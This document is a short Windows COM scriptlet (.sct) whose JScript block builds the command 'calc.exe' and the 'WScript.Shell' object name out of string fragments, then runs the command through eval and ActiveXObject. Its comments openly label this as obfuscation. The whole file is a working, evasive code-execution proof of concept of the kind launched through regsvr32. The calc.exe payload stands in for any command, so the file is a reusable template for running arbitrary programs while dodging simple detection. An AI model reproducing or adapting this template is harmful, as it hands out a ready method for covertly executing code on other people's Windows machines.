<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="DynamicEvalProgID"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
	<script language="JScript">
		<![CDATA[
			// Dynamic string construction for obfuscation
			var parts = ['calc', '.', 'e', 'x', 'e'];
			var command = parts[0] + parts[1] + parts[2] + parts[3] + parts[4];
			
			// Dynamically construct ActiveXObject string
			var objName = ['WScrip', 't.Shel', 'l'].join('');
			
			// Use eval for dynamic execution
			var runCommand = 'new ActiveXObject(objName).Run(command);';
			eval(runCommand);
		]]>
	</script>
</registration>
</scriptlet>
